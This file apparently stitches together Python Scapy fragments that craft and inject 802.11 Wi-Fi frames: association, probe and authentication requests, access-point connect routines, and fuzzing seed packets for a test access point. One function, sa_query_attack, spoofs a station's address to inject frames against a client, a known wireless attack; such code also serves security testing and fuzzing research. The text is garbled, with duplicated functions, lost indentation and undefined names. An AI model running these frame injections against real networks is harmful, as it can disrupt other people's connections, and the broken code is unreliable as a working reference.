def asso_frame_blueprint(self, ap, cl):
capibility = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}")
efields = self.enumerate_asso_fields(self.beacon)
return RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap) / Dot11AssoReq(cap=capibility, listen_interval=3) / \
Dot11Elt(ID=efields[0]['ID'], len=efields[0]['len'], info=efields[0]['info']) / \
Dot11Elt(ID=efields[1]['ID'], len=efields[1]['len'], info=efields[1]['info']) / \
Dot11Elt(ID=efields[48]['ID'], len=efields[48]['len'], info=efields[48]['info'])
def sa_query_attack(interface, ap, sta):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
interface.inject(pkt)
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info="Wireless Attack Testbed") / \
Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' # RSN Version 1
'\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP
'\x01\x00' # 2 Pairwise Cipher Suite (next line)
'\x00\x0f\xac\x04' # AES Cipher
'\x01\x00' # 1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' # Pre-Shared Key
'\x80\x00')) # Supports MFP
interface.inject(pkt)
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
payload = (RadioTap() / Dot11(
addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) /
Dot11Auth(seqnum=1))
self.__thread_sendp__(payload)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.get_rsn_information(essid)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
return 2
if self.lastpacket.getlayer(Dot11Auth).status != 0:
return 4
#Dot11 Association Request
payload = (RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
subtype=0) /
Dot11AssoReq(cap='ESS+short-preamble+short-slot',
listen_interval=10) /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo)
self.__thread_sendp__(payload)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0
return 0
def send_asso_req(client_mac, bssid, ssid):
association_request = (
RadioTap() / Dot11(
proto=0,
FCfield=0,
subtype=0,
addr2=client_mac,
addr3=bssid,
addr1=bssid,
type=0,
) / Dot11AssoReq(listen_interval=5, cap=12548) /
Dot11Elt(info=ssid, ID=0, len=len(ssid)) /
Dot11Elt(info="\x02\x04\x0b\x16\x0c\x12\x18$", ID=1, len=8) /
Dot11Elt(info="0H`l", ID=50, len=4) /
Dot11Elt(info="\x00P\xf2\x02\x00\x01\x00", ID=221, len=7) /
Dot11Elt(info="\x00P\xf2\x04\x10J\x00\x01\x10\x10:\x00\x01\x02",
ID=221,
len=14))
return association_request
def packetSetting(state):
DA = KUAP
SA = wlp1s0
BSSId = Broadcast
testPacket = None
radiohead = RadioTap2( \
version=0, \
pad=0, \
len=24, \
present=4294967296 * 775946400 + 537395200, \
flags=0, \
DataRate=2, \
Channel_freq=27657,
Channel_flags=160, \
SSIsignal1=203, \
RX_Flags=0, \
SSIsignal2=203)
prbhead = Dot11(type=0, \
subtype=4, \
proto=0, \
FCfield=0, \
addr1=DA, \
addr2=SA, \
addr3=BSSId, \
SC=288)
DA = KUAP
BSSId = KUAP
authhead = Dot11(type=0, \
subtype=11, \
proto=0, \
FCfield=0, \
ID=12, \
addr1=DA, \
addr2=SA, \
addr3=BSSId, \
SC=288)
authbody = Dot11Auth(algo=0, seqnum=1)
hex = codecs.getdecoder("hex_codec")
HTprb = hex("2d1a6e1117ff00000000000000000096000100000000000000000000")[0]
#0802 # 0050f204104a000110103a000100100800023148104700106876989b82e8525788e06f19ccfcd79e105400080000000000000000103c00010310020002000010090002000010120002000010210001201023000120102400012010110001201049000600372a000120
#0806 # 0050f204104a000110103a000100100800023148104700106876989b82e8525788e06f19ccfcd79e105400080000000000000000103c00010310020002000010090002000010120002000010210001201023000120102400012010110001201049000600372a000120
vendorwps = hex(
"0050f204104a000110103a000100100800023148104700106876989b82e8525788e06f19ccfcd79e105400080000000000000000103c00010310020002000010090002000010120002000010210001201023000120102400012010110001201049000600372a000120"
)[0]
#0802 # 506f9a0902020025000605005858045101
#0806 # 506f9a0902020025000605005858045101
vendorp2p = hex("506f9a0902020025000605005858045101")[0]
prbelt = Dot11Elt(ID="SSID", info="KUAP") / \
Dot11Elt(ID="Rates", info='\x02\x04\x0b\x16\x0c\x12\x18\x24') / \
Dot11Elt(ID="ESRates", info="\x30\x48\x60\x6c") / HTprb / \
Dot11Elt(ID="vendor", info=vendorwps) / \
Dot11Elt(ID="vendor", info=vendorp2p)
# DA = KUAP
# SA = wlp1s0
# BSSId = Broadcast
HTasso = hex("2d1a661117ff00000000000000000096000100000000000000000000")[0]
EXC = hex("7f0804000a0200000040")[0]
assohead = Dot11(
type=0, \
subtype=0, \
proto=0, \
FCfield=8, \
addr1=DA, \
addr2=SA, \
addr3=BSSId, \
ID=315, \
SC=288)
assobody = Dot11AssoReq(
cap=8452, \
listen_interval=10)
assoelt = Dot11Elt(ID="SSID", info="KUAP") / \
Dot11Elt(ID="Rates", info='\x02\x04\x0b\x16\x0c\x12\x18\x24') / \
Dot11Elt(ID="ESRates", info="\x30\x48\x60\x6c") / HTasso / EXC / \
Dot11Elt(ID="vendor", info="\x00\x50\xf2\x02\x00\x01\x00")
prbMutatePacket = radiohead / prbhead / Dot11ProbeReq(
) / prbelt # /('a'*100) #except elt len= 48
authMutatePacket = radiohead / authhead / authbody # /('a'*100) #except elt len= 54
assoMutatePacket = radiohead / assohead / assobody / assoelt #except elt len= 52
if (state == 0):
testPacket = prbMutatePacket
# print("probe")
# hexdump(testPacket)
elif (state == 1):
print("auth")
testPacket = authMutatePacket
# hexdump(testPacket)
elif (state == 2):
print("asso")
testPacket = assoMutatePacket
# hexdump(testPacket)
return testPacket
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.getRSNInformation(essid)
# Dot11 Authentication Request
sendp(RadioTap() / Dot11(addr1=self.dest_mac,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__()) /
Dot11Auth(seqnum=1),
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(
'Dot11Auth'):
return 2
if self.lastpacket.getlayer('Dot11Auth').status != 0:
return 4
# Dot11 Association Request
sendp(RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__(),
subtype=0) /
Dot11AssoReq(cap='ESS+short-preamble+short-slot',
listen_interval=10) / Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo,
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0 # reset it
return 0
def asso_frame_blueprint(self, ap, cl):
capibility = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}")
efields = self.enumerate_asso_fields(self.beacon)
_pkt = RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap) / Dot11AssoReq(
cap=capibility, listen_interval=3)
return self.form_asso_layers(efields, _pkt)
EXC = hex("7f080400000000000040")[0]
assohead = Dot11(
type=0,\
subtype=0,\
proto=1,\
FCfield=0,\
addr1=DA,\
addr2=wlp1s0,\
addr3=DA,\
ID=315,\
SC=80)
assobody = Dot11AssoReq(
cap=8452,\
listen_interval=10)
assoelt = Dot11Elt(ID="SSID",info="KUAP")/\
Dot11Elt(ID="Rates",info='\x02\x04\x0b\x16\x0c\x12\x18\x24')/\
Dot11Elt(ID="ESRates",info="\x30\x48\x60\x6c")/HTasso/EXC/\
Dot11Elt(ID="vendor", info="\x00\x50\xf2\x02\x00\x01\x00")
prbSeed = prbMutate = radiohead / prbhead / Dot11ProbeReq(
) / prbelt #/('a'*100)
authSeed = authMutatePacket = radiohead / authhead / authbody #/('a'*100)
assoSeed = assoMutatePacket = radiohead / assohead / assobody / assoelt
# wireshark(prbPacket)